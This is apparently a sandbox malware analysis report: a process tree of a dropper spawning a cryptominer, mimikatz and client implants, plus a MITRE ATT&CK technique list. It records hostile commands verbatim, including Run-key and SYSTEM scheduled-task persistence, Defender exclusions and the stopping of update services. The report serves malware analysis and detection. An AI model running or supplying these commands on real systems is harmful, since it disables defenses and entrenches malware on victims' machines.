        "C:\Users\Admin\AppData\Local\Temp\tftp.exe"
        5⤵
        
        PID:3740
    - - C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe
        
        "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
        5⤵
        
        PID:2656
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c taskkill /f /im tftp.exe & tskill tftp.exe
        6⤵
        
        PID:6000
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im tftp.exe
        7⤵
        Kills process with taskkill
        
        PID:9000
      - C:\Users\Admin\AppData\Local\Temp\tftp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\tftp.exe"
        6⤵
        
        PID:7468
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ
        6⤵
        
        PID:5836
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ
        7⤵
        
        PID:6244
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
        6⤵
        
        PID:9040
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:7400
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
        6⤵
        
        PID:8716
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5152
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c powercfg /CHANGE -standby-timeout-ac 0 & powercfg /CHANGE -hibernate-timeout-ac 0 & Powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000
        6⤵
        Power Settings
        
        PID:5408
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:1324
        
        C:\Windows\SysWOW64\powercfg.exe
        
        powercfg /CHANGE -standby-timeout-ac 0
        7⤵
        Power Settings
        
        PID:8784
        
        C:\Windows\SysWOW64\powercfg.exe
        
        powercfg /CHANGE -hibernate-timeout-ac 0
        7⤵
        Power Settings
        
        PID:4932
        
        C:\Windows\SysWOW64\powercfg.exe
        
        Powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000
        7⤵
        Power Settings
        
        PID:4448
- C:\Users\Admin\Desktop\New Text Document mod.exe
  "C:\Users\Admin\Desktop\New Text Document mod.exe"
  2⤵
  PID:5560
- - C:\Users\Admin\Desktop\._cache_New Text Document mod.exe
    "C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"
    3⤵
    PID:3696
- C:\Users\Admin\Desktop\New Text Document mod.exe
  "C:\Users\Admin\Desktop\New Text Document mod.exe"
  2⤵
  PID:6760
- - C:\Users\Admin\Desktop\._cache_New Text Document mod.exe
    "C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"
    3⤵
    PID:6364
  - - C:\Users\Admin\Desktop\a\cbot.exe
      "C:\Users\Admin\Desktop\a\cbot.exe"
      4⤵
      PID:5612
- C:\Users\Admin\Desktop\New Text Document mod.exe
  "C:\Users\Admin\Desktop\New Text Document mod.exe"
  2⤵
  PID:1352
- - C:\Users\Admin\Desktop\._cache_New Text Document mod.exe
    "C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"
    3⤵
    PID:3148
  - - C:\Users\Admin\Desktop\a\Client.exe
      "C:\Users\Admin\Desktop\a\Client.exe"
      4⤵
      PID:6708
- C:\Users\Admin\Desktop\New Text Document mod.exe
  "C:\Users\Admin\Desktop\New Text Document mod.exe"
  2⤵
  PID:5136
- - C:\Users\Admin\Desktop\._cache_New Text Document mod.exe
    "C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"
    3⤵
    PID:3664
- C:\Users\Admin\Desktop\New Text Document mod.exe
  "C:\Users\Admin\Desktop\New Text Document mod.exe"
  2⤵
  PID:6880
- - C:\Users\Admin\Desktop\._cache_New Text Document mod.exe
    "C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"
    3⤵
    PID:2176
- C:\Users\Admin\Desktop\New Text Document mod.exe
  "C:\Users\Admin\Desktop\New Text Document mod.exe"
  2⤵
  PID:3092
- - C:\Users\Admin\Desktop\._cache_New Text Document mod.exe
    "C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"
    3⤵
    PID:6856
  - - C:\Users\Admin\Desktop\a\mimikatz.exe
      "C:\Users\Admin\Desktop\a\mimikatz.exe"
      4⤵
      PID:7000
  - - C:\Users\Admin\Desktop\a\Client-built.exe
      "C:\Users\Admin\Desktop\a\Client-built.exe"
      4⤵
      PID:1548
- C:\Users\Admin\Desktop\New Text Document mod.exe
  "C:\Users\Admin\Desktop\New Text Document mod.exe"
  2⤵
  PID:3868
- - C:\Users\Admin\Desktop\._cache_New Text Document mod.exe
    "C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"
    3⤵
    PID:2968
- C:\Users\Admin\Desktop\New Text Document mod.exe
  "C:\Users\Admin\Desktop\New Text Document mod.exe"
  2⤵
  PID:1688
- - C:\Users\Admin\Desktop\._cache_New Text Document mod.exe
    "C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"
    3⤵
    PID:900
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  PID:8492
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe"
    3⤵
    PID:5996
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2148 -parentBuildID 20240401114208 -prefsHandle 1728 -prefMapHandle 2112 -prefsLen 21258 -prefMapSize 243020 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8404967a-912a-41e0-b297-b939cc545f81} 5996 "\\.\pipe\gecko-crash-server-pipe.5996" gpu
      4⤵
      PID:8840
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2396 -parentBuildID 20240401114208 -prefsHandle 1724 -prefMapHandle 1720 -prefsLen 21258 -prefMapSize 243020 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {89d41042-0c1c-428f-bc18-63cb819e48b5} 5996 "\\.\pipe\gecko-crash-server-pipe.5996" socket
      4⤵
      PID:6228
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3080 -childID 1 -isForBrowser -prefsHandle 2748 -prefMapHandle 1064 -prefsLen 21326 -prefMapSize 243020 -jsInitHandle 896 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2ac1382c-6cf4-40f9-9037-996f89b72d0f} 5996 "\\.\pipe\gecko-crash-server-pipe.5996" tab
      4⤵
      PID:188
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2640 -childID 2 -isForBrowser -prefsHandle 3296 -prefMapHandle 3300 -prefsLen 22179 -prefMapSize 243020 -jsInitHandle 896 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {af8477fa-bfc3-4e70-9eaa-7f4e5726eff2} 5996 "\\.\pipe\gecko-crash-server-pipe.5996" tab
      4⤵
      PID:5432
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5020 -parentBuildID 20240401114208 -prefsHandle 4740 -prefMapHandle 4120 -prefsLen 30178 -prefMapSize 243020 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d9046374-2277-49b4-a722-1e3707eeed51} 5996 "\\.\pipe\gecko-crash-server-pipe.5996" rdd
      4⤵
      PID:9208
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5284 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 5288 -prefMapHandle 5292 -prefsLen 30178 -prefMapSize 243020 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fefba586-e768-46f1-8da8-d90792eddcf3} 5996 "\\.\pipe\gecko-crash-server-pipe.5996" utility
      4⤵
      PID:8508
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5512 -childID 3 -isForBrowser -prefsHandle 5448 -prefMapHandle 5452 -prefsLen 28181 -prefMapSize 243020 -jsInitHandle 896 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b2c909bc-ef52-4253-ae10-4f6420011791} 5996 "\\.\pipe\gecko-crash-server-pipe.5996" tab
      4⤵
      PID:5012
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5580 -childID 4 -isForBrowser -prefsHandle 5632 -prefMapHandle 5636 -prefsLen 28181 -prefMapSize 243020 -jsInitHandle 896 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8d74b668-3815-42fe-b07c-64034c4f220a} 5996 "\\.\pipe\gecko-crash-server-pipe.5996" tab
      4⤵
      PID:1892
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5828 -childID 5 -isForBrowser -prefsHandle 5904 -prefMapHandle 5900 -prefsLen 28181 -prefMapSize 243020 -jsInitHandle 896 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2721b12a-ea90-4747-8571-27f4b3514d74} 5996 "\\.\pipe\gecko-crash-server-pipe.5996" tab
      4⤵
      PID:8464
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3584 -childID 6 -isForBrowser -prefsHandle 5880 -prefMapHandle 3076 -prefsLen 28631 -prefMapSize 243020 -jsInitHandle 896 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c4dc9b57-2698-479c-8d9d-8387d4a75028} 5996 "\\.\pipe\gecko-crash-server-pipe.5996" tab
      4⤵
      PID:1020
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  PID:1144
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe"
    3⤵
    PID:1984
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe"
  2⤵
  PID:7776
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ffc6538cc40,0x7ffc6538cc4c,0x7ffc6538cc58
    3⤵
    PID:9204
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2180,i,1342031954381004447,11927133924927886080,262144 --variations-seed-version=20250113-050136.126000 --mojo-platform-channel-handle=2176 /prefetch:2
    3⤵
    PID:4816
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1876,i,1342031954381004447,11927133924927886080,262144 --variations-seed-version=20250113-050136.126000 --mojo-platform-channel-handle=2320 /prefetch:3
    3⤵
    PID:6600
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2116,i,1342031954381004447,11927133924927886080,262144 --variations-seed-version=20250113-050136.126000 --mojo-platform-channel-handle=2432 /prefetch:8
    3⤵
    PID:7580
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3172,i,1342031954381004447,11927133924927886080,262144 --variations-seed-version=20250113-050136.126000 --mojo-platform-channel-handle=3204 /prefetch:1
    3⤵
    PID:5472
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3180,i,1342031954381004447,11927133924927886080,262144 --variations-seed-version=20250113-050136.126000 --mojo-platform-channel-handle=3344 /prefetch:1
    3⤵
    PID:8048
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4416,i,1342031954381004447,11927133924927886080,262144 --variations-seed-version=20250113-050136.126000 --mojo-platform-channel-handle=4536 /prefetch:1
    3⤵
    PID:3724
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4912,i,1342031954381004447,11927133924927886080,262144 --variations-seed-version=20250113-050136.126000 --mojo-platform-channel-handle=4888 /prefetch:8
    3⤵
    PID:5656
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4920,i,1342031954381004447,11927133924927886080,262144 --variations-seed-version=20250113-050136.126000 --mojo-platform-channel-handle=4840 /prefetch:8
    3⤵
    PID:8176
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=4444,i,1342031954381004447,11927133924927886080,262144 --variations-seed-version=20250113-050136.126000 --mojo-platform-channel-handle=4492 /prefetch:1
    3⤵
    PID:9152
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=4872,i,1342031954381004447,11927133924927886080,262144 --variations-seed-version=20250113-050136.126000 --mojo-platform-channel-handle=4788 /prefetch:1
    3⤵
    PID:5876

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3756

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4056

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3532

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4352

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4220

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:5104

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
PID:1424

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
PID:2364

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:3068

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:2280

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3316

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca
1⤵
PID:572

C:\Windows\System32\smartscreen.exe
C:\Windows\System32\smartscreen.exe -Embedding
1⤵
PID:928

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
1⤵
PID:4684

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:4236

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:4340

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:2712

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:4368

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:1232

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:4120

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
PID:1576
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3808 -ip 3808
  2⤵
  PID:4000

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:1920

C:\ProgramData\Screenshots\Lightshot.exe
C:\ProgramData\Screenshots\Lightshot.exe
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:6932
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:6956
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:6964
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:5232
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:1048
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:4996
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:3816
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:2592
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:2896
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:5124
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:5708
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5372
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:5512
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:5236
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:5288
- C:\Windows\system32\dialer.exe
  C:\Windows\system32\dialer.exe
  2⤵
  PID:5296
- C:\Windows\system32\dialer.exe
  C:\Windows\system32\dialer.exe
  2⤵
  PID:5636
- C:\Windows\system32\dialer.exe
  dialer.exe
  2⤵
  PID:6388

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:7152

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5592

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 8008 -ip 8008
1⤵
PID:8912

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 9016 -ip 9016
1⤵
PID:8432

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:8656

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 8008 -ip 8008
1⤵
PID:8884

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 8412 -ip 8412
1⤵
PID:9200

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 8568 -ip 8568
1⤵
PID:8032

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 6988 -ip 6988
1⤵
PID:4548

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:8344

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:6080

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

System Services

T1569

Service Execution

T1569.002

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Impair Defenses

T1562

Indicator Removal

T1070

Clear Windows Event Logs

T1070.001

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Network Service Discovery

T1046

Query Registry

Remote System Discovery

T1018

System Information Discovery